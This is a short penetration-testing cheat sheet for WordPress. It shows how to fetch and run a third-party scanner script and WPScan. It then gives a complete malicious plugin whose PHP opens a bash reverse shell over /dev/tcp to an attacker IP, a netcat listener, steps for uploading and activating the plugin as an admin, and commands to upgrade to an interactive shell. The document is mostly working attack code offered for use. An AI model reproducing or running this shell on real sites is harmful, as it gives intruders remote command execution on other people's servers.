Find Wordpress Applications and Run WPScan
wget https://raw.githubusercontent.com/Bhanunamikaze/PenTest-Scripts/main/Wordpress_Scanner.sh
Wordpress_Scanner.sh domains.txt
Note: you need to update WPS API Key in the script
Scan Wordpress for Vulnerabilities
- Login/Register to WPSScan website and Generate an API Key
wpscan --url <URL> --api-token <your WP Token Here> -o output.txt
Wordpress Reverse Shell
#Create a new plugin as below - save it as somename.php
<?php
/**
* Plugin Name: New Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 0.1
* Author: Testing dude.. hope it works
* Author URI: http://www.newfold.com
*/
exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.10.10/8080 0>&1'");
?>
#zip the file to somename.zip
#Start a listener
nc -nvlp 8080
# login to wordpress --> plugins --> add new plugin --> upload the zip
# Activate the plugin, you should get a shell on your listener
#Get an Interactive Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl +Z
stty raw -echo
fg
export TERM=xterm